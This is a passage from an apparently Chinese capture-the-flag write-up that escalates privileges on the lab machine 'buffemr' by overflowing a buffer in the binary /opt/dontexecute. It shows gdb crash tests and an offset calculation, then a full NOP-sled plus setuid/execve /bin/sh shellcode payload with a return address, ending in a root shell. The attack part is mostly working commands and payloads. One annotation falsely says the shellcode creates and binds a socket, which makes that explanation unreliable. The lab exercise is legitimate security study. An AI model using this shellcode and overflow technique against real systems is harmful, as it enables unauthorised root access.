Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

将生成的字符串用命令r在 gdb 中运行

buffemr@buffemr:/opt$ gdb -q dontexecute
Reading symbols from dontexecute...(no debugging symbols found)...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /opt/dontexecute Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Program received signal SIGSEGV, Segmentation fault.
0x31724130 in ?? ()

可以看到程序崩溃了,提示0x31724130

计算一下偏移量

┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# ./pattern_offset.rb -q 0x31724130               
[*] Exact match at offset 512

可以看到偏移量为512

到这里可能还是单纯的利用工具做出来的,我们进一步去分析怎么操作

$(python -c "print 'A'*100")
Starting program: /opt/dontexecute $(python -c "print 'A'*100")
[Inferior 1 (process 3940) exited normally]

A 的十六进制是 \x41,在 520 处它会覆盖 EIP,而在 510 处它不会覆盖 EIP,因此我们需要找到在 520 和 510

(gdb) run $(python -c "print 'A'*510")
Starting program: /opt/dontexecute $(python -c "print 'A'*510")

Program received signal SIGSEGV, Segmentation fault.
0x5655572c in main ()
(gdb) run $(python -c "print 'A'*511")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*511")

Program received signal SIGSEGV, Segmentation fault.
0x5655572c in main ()
(gdb) run $(python -c "print 'A'*512")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*512")

Program received signal SIGSEGV, Segmentation fault.
0xffffd776 in ?? ()
(gdb) run $(python -c "print 'A'*513")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*513")

Program received signal SIGSEGV, Segmentation fault.
0x56550041 in ?? ()
(gdb) run $(python -c "print 'A'*514")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*514")

Program received signal SIGSEGV, Segmentation fault.
0x56004141 in ?? ()
(gdb) run $(python -c "print 'A'*515")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*515")

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run $(python -c "print 'A'*516")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*516")

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) 

经过几次尝试,到516这里就都是AAAA

我们需要 516 个 A 来覆盖 EIP,并且 4 个字节是返回地址,因此缓冲区大小将为 516-4 = 512

这里找一个shellcode:shell-code-priv-esc

\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

\x31\xc0 - XOR寄存器EAX和自身,将EAX寄存器的值设置为0。

\x31\xdb - XOR寄存器EBX和自身,将EBX寄存器的值设置为0。

\xb0\x17 - 将立即数0x17(十进制的23)移动到AL寄存器(即EAX的低8位)。

\xcd\x80 - INT 0x80,这是一个软件中断,用于进行系统调用。

\xeb\x1f - JMP 0x1f,跳转到当前指令地址后的0x1f(31)字节。

\x5e\x89\x76\x08 - 一系列指令用于准备和调用/bin/sh

\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff - 这部分是用于创建socket,绑定,监听,以及执行/bin/sh的代码。

计算一下字节数

┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# python2 -c "print len('\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh')"
53

现在计划是使用 NOP 或无操作后跟 shell 代码,以获得 shell.

需要计算使用多少NOP

512-53=459

NOP 是十六进制的 \x90

所以可以这样构造payload

python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'"

gdb运行一下看看

(gdb) run $(python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'")

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) 

x/300wx $esp看一下内存,可以看到0x90是我们的 NOP,因此我们可以使用 NOP 的任何返回地址来让 shell 在之后执行

image-20240404190213061

运行下面的payload

run $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")

成功运行后,发现并么有提权成功

(gdb) run $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
process 3982 is executing new program: /bin/dash
$ id
uid=1000(buffemr) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
$ whoami
buffemr
$ 

退出gdb后利用dontexecute执行

mr@buffemr:/opt$ ./dontexecute $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
# whoami
root

成功提权

三、总结

该靶机前期需要对down下来的源码进行简单分析,提取泄露的敏感信息如账户密码等,成功登录后台后,可以看到cms的版本号,可以通过kali自带的漏洞库查找是否相关的漏洞,提权这块值得学习的是缓冲区溢出,这个后续可以多学习学习。

  1. searchsploit的使用
  2. 缓冲区溢出提权
  3. strcpy溢出原理学习
posted @ 2024-04-08 20:00  hirak0  阅读(53)  评论(0编辑  收藏  举报